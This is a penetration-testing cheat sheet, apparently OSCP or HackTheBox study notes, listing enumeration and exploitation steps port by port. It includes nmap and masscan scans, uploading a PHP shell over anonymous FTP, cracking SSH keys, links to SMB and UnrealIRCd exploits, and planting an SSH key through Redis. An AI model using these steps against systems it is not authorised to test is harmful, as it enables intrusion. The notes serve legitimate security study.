Enumeration

Port Scanning :

nmap -sC -sV -o nmap -A -T5 10.10.10.x

Host Discovery
   •  nmap -sn 10.10.1.1-254 -vv -oA hosts
   •  netdiscover -r 10.10.10.0/24

DNS server discovery
   •  nmap -p 53 10.10.10.1-254 -vv -oA dcs
   
NSE Scripts Scan 
   * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan)
   
Port specific NSE script list :

   ls /usr/share/nmap/scripts/ssh*
   ls /usr/share/nmap/scripts/smb*

Scanning all 65535 ports :

masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.x

Running specific NSE scripts :
    nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A

sC - default scripts, sV - scan for versions, oA- output all formats

Optional - sT (performs full scan instead of syn-scan to prevent getting flagged by firewalls)

From Apache Version to finding Ubuntu version -> ubuntu httpd versions

FTP : (Port 21)

• anonymous login check

  • ftp <ip address>

  • username : anonymous

  • pwd : anonymous

  • file upload -> put shell.php

SSH : (Port 22)

id_rsa.pub : Public key that can be used in authorized_keys for login

id_rsa : Private key that is used for login. Might ask for password. can be cracked with ssh2john and john

• id_rsa

• ssh -i id_rsa [email protected]

• For passwordless login, add id_rsa.pub to target's authorized_keys

• ssh2john

DNS Zone transfer check : (Port 53)

• If port 53 is open

• Add host to /etc/hosts

• dig axfr smasher.htb @10.10.10.135

• https://ghostphisher.github.io/smasher2

• Add the extracted domain to /etc/hosts and dig again

RPC Bind (111)

RPC (135)

SMB (139 & 445)

****https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html****

SMB Exploits :

• Samba "username map script" Command Execution - CVE-2007-2447

  • Version 3.0.20 through 3.0.25rc3

  • Samba-usermap-exploit.py - https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851

• Eternal Blue - CVE-2017-0144

  • SMB v1 in Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016

  • https://github.com/adithyan-ak/MS17-010-Manual-Exploit

• SambaCry - CVE-2017-7494

  • 4.5.9 version and before

  • https://github.com/opsxcq/exploit-CVE-2017-7494

SNMP (161)

IRC (194,6667,6660-7000)

• nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb

• ****https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor (exploit code)

NFS (2049)

• showmount -e 10.1.1.27

• mkdir /mnt/nfs

• mount -t nfs 192.168.2.4:/nfspath-shown /mnt/nfs

• Permission Denied ? (https://blog.christophetd.fr/write-up-vulnix/)

MYSQL (3306)

• nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122

Redis (6379)

In the output of config get * you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:

1. Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa

2. Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

3. Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit

4. Save the public key to the authorized_keys file on redis server:

Port Knocking :

Misc :

• Run autorecon

• https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/enumeration

IF NOTHING WORKS

• HTB Admirer (https://www.youtube.com/watch?v=_zMg0fHwwfw&ab_channel=IppSec)